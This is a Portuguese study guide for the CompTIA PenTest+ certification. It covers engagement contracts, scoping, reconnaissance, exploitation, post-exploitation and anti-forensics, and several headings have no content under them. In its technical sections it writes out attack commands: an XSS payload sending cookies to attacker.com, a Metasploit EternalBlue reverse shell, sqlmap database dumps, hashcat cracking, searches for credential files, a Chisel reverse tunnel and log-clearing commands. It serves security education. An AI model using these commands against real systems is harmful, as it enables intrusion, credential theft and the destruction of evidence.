CompTIA PenTest+
Guia de Estudo Completo

Este domínio é o alicerce ético e contratual de qualquer penetration test profissional. Antes de qualquer comando nmap ou de executar um exploit, o pentester precisa estabelecer um quadro legal, definir o escopo com precisão e alinhar expectativas com o cliente. Um teste mal-escopado não é apenas ineficaz — é uma responsabilidade legal.

1.1 Pre-engagement Activities

As atividades pré-engagement determinam o sucesso de todo o teste. O pentester e o cliente precisam de acordar formalmente sobre objetivos, limites e regras antes de qualquer atividade técnica.

Tipos de Testes

• Black-box (caixa-preta): o pentester não recebe qualquer informação prévia sobre a infraestrutura. Simula um atacante externo real. Mais demorado e custoso.
• White-box (caixa-branca): acesso total — código-fonte, credenciais, arquitetura. Permite análise profunda mas não representa ataques realistas.
• Gray-box (caixa-cinzenta): conhecimento parcial. Simula um insider threat ou um atacante com algum acesso já comprometido. Geralmente o melhor custo-benefício.

Tipos de Engagement por Conhecimento da Equipa Defensiva

1.2 Documentação Contratual Crítica

Documentação inadequada é a principal causa de problemas legais em pentests. Cada documento tem uma função específica e nenhum deles é opcional num engagement profissional.

SOW — Statement of Work

Documento técnico que detalha o que será feito: escopo, deliverables, cronograma, recursos, critérios de aceitação. O SOW é o "contrato técnico" do engagement.

MSA — Master Service Agreement

Acordo-quadro entre pentester e cliente que define termos gerais aplicáveis a múltiplos projetos: responsabilidades, pagamento, jurisdição, propriedade intelectual. Evita renegociar termos a cada novo SOW.

NDA — Non-Disclosure Agreement

Acordo de confidencialidade. Crítico: pode ser unilateral (apenas o pentester se compromete) ou bilateral/mutual. Define o que é informação confidencial, duração da obrigação e exceções.

ROE — Rules of Engagement

Define como o teste será executado na prática: janelas de tempo permitidas, técnicas autorizadas/proibidas, sistemas in-scope e out-of-scope, contactos de emergência, procedimentos de escalação.

1.3 Scoping

O scoping define exatamente o que pode e não pode ser testado. Erros de scoping levam a duas situações catastróficas: scope creep (testes além do autorizado) ou coverage gaps (áreas críticas não testadas).

Elementos do Escopo

• In-scope: ranges de IP, domínios, aplicações, APIs, redes wireless, instalações físicas que podem ser testadas.
• Out-of-scope: sistemas críticos não-resilientes, infraestrutura de terceiros, sistemas em produção sem janela de manutenção.
• Constraints: tempo (janelas permitidas), técnicas proibidas (ex.: DoS, engenharia social telefónica), tipos de dados que não podem ser exfiltrados.
• Third-party considerations: serviços cloud (AWS, Azure, GCP) exigem notificação prévia. ISPs e provedores de hosting podem ter políticas de uso aceitável.

Compliance e Frameworks Regulatórios

1.4 Comunicação Durante o Engagement

A comunicação contínua é o que distingue um pentester profissional de um script kiddie. Critical findings precisam de ser comunicados imediatamente, não no relatório final.

Triggers de Comunicação Obrigatória

1. Critical/high findings: vulnerabilidades exploráveis que dão acesso administrativo ou exposição de dados sensíveis.
2. Indicadores de comprometimento prévio: se durante o teste forem descobertos indícios de que a organização já foi (ou está a ser) comprometida por um atacante real.
3. Quebra de escopo acidental: se descobrir que um sistema in-scope tem dependências out-of-scope.
4. Disrupção operacional: qualquer impacto não-intencional em sistemas de produção.

1.5 Relatório Final

O relatório é o deliverable principal do engagement. Frequentemente, é o único artefacto que o cliente vai ler em detalhe. Um teste tecnicamente perfeito com um relatório medíocre é um engagement falhado.

Estrutura Padrão

1. Executive Summary: 1-2 páginas para gestão. Linguagem não-técnica. Risco geral, principais findings, recomendações estratégicas.
2. Methodology: como o teste foi executado (PTES, OSSTMM, NIST SP 800-115).
3. Findings detalhados: cada vulnerabilidade com CVSS score, evidence (screenshots, logs), impacto de negócio e remediação.
4. Appendices: ferramentas usadas, lista completa de testes, raw output relevante.

O reconhecimento é a fase onde o pentester constrói uma imagem completa do alvo antes de atacar. Um reconhecimento deficiente leva a ataques mal direcionados; um reconhecimento excelente muitas vezes revela vulnerabilidades críticas sem sequer lançar um exploit. "Hacking is 90% reconnaissance."

2.1 Reconhecimento Passivo (OSINT)

No reconhecimento passivo, o pentester coleta informação sem interagir diretamente com a infraestrutura do alvo. O alvo não consegue detetar esta fase nos seus logs.

DNS Passive Recon

• whois: registo do domínio, datas, contactos administrativos, servidores de nomes. whois example.com
• DNS records: A, AAAA, MX, NS, TXT, CNAME, SOA — cada tipo revela infraestrutura diferente.
• Certificate Transparency: logs públicos de SSL/TLS (crt.sh) revelam subdomínios que não aparecem em DNS público.
• Passive DNS: serviços como SecurityTrails, DNSDB e VirusTotal mostram histórico de resoluções DNS.

OSINT Frameworks e Fontes

Google Dorks mais comuns no exame

site:example.com filetype:pdf          # PDFs expostos
site:example.com inurl:admin           # Painéis administrativos
intitle:"index of" site:example.com    # Directory listing
"password" filetype:xls site:example.com # Planilhas com senhas
inurl:".env" site:example.com          # Ficheiros .env expostos
cache:example.com                      # Versão em cache do Google

2.2 Reconhecimento Ativo e Scanning

No reconhecimento ativo, o pentester interage diretamente com os sistemas do alvo. Os logs do alvo registam estas interações. Este tipo de reconhecimento requer autorização explícita.

Nmap — Domínio completo

O Nmap é o scanner de rede mais importante para o exame. Conhecer as flags e o que cada uma faz é mandatório.

Interpretação dos estados de portas Nmap

• open: porta aceita conexões — serviço ativo.
• closed: porta acessível, mas nenhum serviço a escutar (RST recebido).
• filtered: firewall descarta pacotes — não se sabe se há serviço (sem resposta ou ICMP unreachable).
• open|filtered: Incerteza — usado em UDP e scans NULL/FIN/Xmas quando não há resposta.

Enumeration de Serviços Comuns

2.3 Web Application Reconnaissance

Enumeração de Diretórios e Ficheiros

# Gobuster — brute force de diretórios
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,txt,html

# FFUF — fuzzing rápido
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302

# Nikto — scanner de vulnerabilidades web básico
nikto -h https://target.com

Fingerprinting de Tecnologias

• Wappalyzer: extensão de browser que identifica CMS, frameworks, servidores.
• whatweb: ferramenta CLI equivalente.
• Headers HTTP: Server:, X-Powered-By:, X-Generator: frequentemente revelam versões.
• Cookies: nomes de cookies revelam tecnologias (PHPSESSID = PHP, JSESSIONID = Java, ASP.NET_SessionId = ASP.NET).
• robots.txt / sitemap.xml: frequentemente listam endpoints sensíveis que os admins não queriam indexar mas deixaram acessíveis.

2.4 Wireless Reconnaissance

Wireless recon requer hardware específico (placa com modo monitor e packet injection) e é legal apenas em redes próprias ou com autorização explícita.

Descobrir vulnerabilidades não é apenas correr um scanner e exportar o relatório. Um pentester profissional valida cada finding manualmente, elimina falsos positivos, correlaciona vulnerabilidades para descobrir chains de ataque e prioriza com contexto de negócio. Scanners são um ponto de partida, não o destino.

3.1 Scanners de Vulnerabilidades

3.2 CVSS — Sistema de Pontuação de Vulnerabilidades

O Common Vulnerability Scoring System (CVSS) é o sistema padrão para quantificar a severidade de vulnerabilidades. O exame foca principalmente CVSS v3.1 e a transição para v4.0.

CVSS v3.1 — Grupos de Métricas

Escalas de Severidade CVSS

3.3 CVE, CWE e NVD

• CVE (Common Vulnerabilities and Exposures): identificador único para vulnerabilidades conhecidas. Formato: CVE-ANO-NÚMERO (ex.: CVE-2021-44228 = Log4Shell).
• CWE (Common Weakness Enumeration): categoriza o tipo de fraqueza de software (ex.: CWE-79 = XSS, CWE-89 = SQL Injection, CWE-119 = Buffer Overflow). Uma CWE pode gerar múltiplos CVEs.
• NVD (National Vulnerability Database): base de dados do NIST que enriquece os CVEs com CVSS scores, CPE (Common Platform Enumeration) e referências.
• EPSS (Exploit Prediction Scoring System): probabilidade de uma vulnerabilidade ser explorada nos próximos 30 dias. Complementa CVSS para priorização.

3.4 Análise Manual de Vulnerabilidades Web

Scanners automatizados frequentemente falham em lógica de negócio complexa, autenticação e fluxos de estado. A análise manual usando Burp Suite é indispensável.

OWASP Top 10 (2021) para o exame

Análise de Código Estático (SAST) vs Dinâmico (DAST)

• SAST (Static Application Security Testing): analisa código-fonte sem executar a aplicação. Ferramentas: Semgrep, SonarQube, Checkmarx. Encontra vulnerabilidades cedo no SDLC. Requer acesso ao código.
• DAST (Dynamic Application Security Testing): testa a aplicação em execução, simulando um atacante. Ferramentas: Burp Suite, OWASP ZAP. Não requer acesso ao código.
• IAST (Interactive): combina os dois, usando agentes dentro da aplicação durante a execução.

3.5 Análise de Vulnerabilidades de Rede e Infraestrutura

Vulnerabilidades Comuns de Rede

Com 35% do exame, este domínio é o coração da PenTest+. Abrange a exploração de vulnerabilidades em múltiplas superfícies de ataque: redes, aplicações web, wireless, cloud e factor humano. O pentester deve não apenas executar ataques, mas selecionar a técnica certa para cada contexto e compreender as implicações de cada ação.

4.1 Exploração de Rede

Metasploit Framework — Estrutura

# Fluxo típico de exploração com Metasploit
msf6 > search ms17-010                    # Buscar módulos
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > show options          # Ver opções necessárias
msf6 exploit(...) > set RHOSTS 10.10.10.1 # Definir alvo
msf6 exploit(...) > set LHOST 10.10.14.5  # Definir listener
msf6 exploit(...) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > run                   # Executar

Ataques Man-in-the-Middle (MitM)

Ataques a Passwords

Hashcat — Modos essenciais

# Hash type detection
hashid '$2y$10$...'    # Identificar tipo de hash

# Hashcat — modes comuns
hashcat -m 0    hash.txt wordlist.txt        # MD5
hashcat -m 1000 hash.txt wordlist.txt        # NTLM
hashcat -m 1800 hash.txt wordlist.txt        # sha512crypt (Linux /etc/shadow)
hashcat -m 13100 hash.txt wordlist.txt       # Kerberoast (TGS-REP)
hashcat -m 22000 hash.txt wordlist.txt       # WPA2

# Modos de ataque
-a 0  # Dictionary
-a 1  # Combination (two wordlists)
-a 3  # Brute force mask (ex: ?u?l?l?l?d?d)
-a 6  # Hybrid wordlist + mask

4.2 Exploração de Aplicações Web

SQL Injection — Tipos e Técnicas

# SQLMap — automatização de SQL Injection
sqlmap -u "https://target.com/search?q=test" --dbs       # Listar DBs
sqlmap -u "https://target.com/search?q=test" -D mydb --tables  # Listar tabelas
sqlmap -u "https://target.com/search?q=test" -D mydb -T users --dump  # Dump tabela
sqlmap -r request.txt --level=5 --risk=3                  # A partir de ficheiro Burp

Cross-Site Scripting (XSS)

• Reflected XSS: payload na URL/parâmetro, refletido imediatamente na resposta. Requer que a vítima clique num link. Ex.: https://site.com/search?q=<script>alert(1)</script>
• Stored XSS: payload armazenado no servidor (comentário, perfil). Executa no browser de qualquer utilizador que vê o conteúdo. Mais crítico.
• DOM-based XSS: o payload é processado pelo JavaScript do cliente sem passar pelo servidor. document.location.hash sem sanitização.
• XSS → Account takeover: <script>document.location='https://attacker.com/steal?c='+document.cookie</script>

Outros Ataques Web Críticos

4.3 Social Engineering

O factor humano é frequentemente o vetor de ataque mais eficaz. Técnicas de engenharia social exploram psicologia, não tecnologia.

Princípios Psicológicos (Cialdini)

• Autoridade: "Sou do IT, preciso das suas credenciais para resolver um problema urgente."
• Urgência / Scarcity: "A sua conta será bloqueada em 24h se não agir agora."
• Social Proof: "Os seus colegas já atualizaram os dados — só falta você."
• Reciprocidade: Oferecer algo (ajuda, brinde) para criar sentimento de obrigação.
• Liking: Criar rapport, fingir ser colega ou amigo.
• Commitment: Pequenos compromissos iniciais que levam a pedidos maiores.

Técnicas e Ferramentas

4.4 Ataques Wireless

4.5 Ataques Cloud e Contentor

A superfície de ataque cloud é distinta da infraestrutura on-premises. Misconfigurations são a principal causa de breaches em cloud.

Ataques Comuns em AWS

• S3 Bucket enumeration: aws s3 ls s3://nome-do-bucket --no-sign-request — buckets públicos são frequentemente mal configurados.
• IAM Privilege Escalation: iam:CreatePolicyVersion, iam:AttachUserPolicy — permissões que permitem escalar para admin.
• SSRF → Metadata: Acessar 169.254.169.254 para credenciais IAM temporárias.
• Lambda function exploitation: Environment variables com secrets, event injection.
• Container escape: Docker socket montado, capabilities excessivas, privileged containers.

Ferramentas Cloud Pentest

O acesso inicial é apenas o começo. A fase pós-exploração determina o verdadeiro impacto de um comprometimento: quanto mais profundo o pentester consegue ir, mais realista é a simulação de um atacante avançado (APT). Esta fase também é a mais delicada eticamente — cada ação deve ser autorizada e documentada.

5.1 Enumeração Pós-exploração

Após obter um shell, a prioridade é entender o ambiente antes de agir. Enumeração apressada pode triggerar alertas do EDR/SIEM.

Comandos de enumeração essenciais (Windows)

# Informação do sistema
whoami /all              # User, groups, privileges
systeminfo               # OS, hotfixes, domain info
hostname
net user                 # Utilizadores locais
net localgroup administrators  # Admins locais
net group "Domain Admins" /domain  # Domain Admins

# Rede
ipconfig /all            # IPs, DNS, gateways
netstat -ano             # Conexões ativas e portas
route print              # Routing table
arp -a                   # ARP cache (hosts na rede local)

# Processos e serviços
tasklist /v              # Processos em execução
sc query                 # Serviços Windows
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  # Startup items

# Ficheiros sensíveis
dir /s /b *.txt *.xml *.config 2>nul | findstr /i "pass password cred"
findstr /si "password" *.xml *.txt *.config

Enumeração pós-exploração (Linux)

id; whoami                    # User e grupos
uname -a                      # Kernel version (para kernel exploits)
cat /etc/passwd               # Utilizadores do sistema
sudo -l                       # Sudo permissions (crítico!)
find / -perm -4000 2>/dev/null  # SUID binaries
crontab -l; cat /etc/cron*    # Cron jobs
env                           # Environment variables (possíveis secrets)
cat ~/.bash_history            # Histórico de comandos
find / -name "*.conf" 2>/dev/null | xargs grep -l "password" 2>/dev/null

5.2 Privilege Escalation

Windows — Técnicas de Escalada

Linux — Técnicas de Escalada

5.3 Lateral Movement

Lateral movement é o processo de mover-se entre sistemas na rede após o acesso inicial, expandindo o foothold e aproximando-se do objetivo (Domain Admin, dados sensíveis, etc.).

Técnicas de Lateral Movement

Pivoting e Tunneling

Pivoting é usar um sistema comprometido como "trampolim" para aceder a redes que o atacante não consegue atingir diretamente.

# SSH Dynamic Port Forwarding (SOCKS proxy)
ssh -D 1080 user@pivot_host        # Cria SOCKS proxy na porta 1080
proxychains nmap -sT 10.10.10.0/24 # Usa o proxy para scan da rede interna

# SSH Local Port Forwarding
ssh -L 8080:internal_target:80 user@pivot_host  # Aceder a port 80 do target interno via porta local 8080

# Chisel (tunneling através de HTTP)
# Servidor (no attacker):
chisel server -p 8000 --reverse
# Cliente (no pivot host):
chisel client attacker_ip:8000 R:1080:socks  # Reverse SOCKS proxy

# Metasploit portfwd (dentro de sessão Meterpreter)
meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.10.50

5.4 Persistence

Persistence garante que o acesso se mantém mesmo após reboots, logouts ou mudanças de password. Em engagements, persistence é criada para demonstrar que um atacante poderia manter acesso indefinidamente.

Técnicas de Persistence

5.5 Exfiltração de Dados

A exfiltração demonstra o impacto máximo de um comprometimento. Técnicas modernas focam-se em canais que passam despercebidos nos controlos de segurança.

Técnicas de Exfiltração

5.6 Anti-Forensics e Cobertura de Trilhas

Em engagements Red Team avançados, simular como um APT cobre os seus rastos é parte do escopo. Em Blue Team defense, conhecer estas técnicas é essencial para forensics e threat hunting.

• Log tampering: wevtutil cl Security (Windows) ou echo "" > /var/log/auth.log (Linux) — limpar logs de eventos.
• Timestomping: modificar timestamps de ficheiros para confundir análise forense temporal.
• Memory-only payloads: malware que vive apenas em memória (fileless) — não deixa artefactos em disco. Meterpreter, Cobalt Strike Beacon.
• Process Injection: injetar código num processo legítimo (svchost.exe, explorer.exe) para ofuscar atividade.
• Living off the Land (LotL): usar ferramentas nativas do SO (PowerShell, WMI, certutil, regsvr32) para evitar alertas de AV/EDR.

🛠️ Toolkit Essencial

🎯 Plataformas de Prática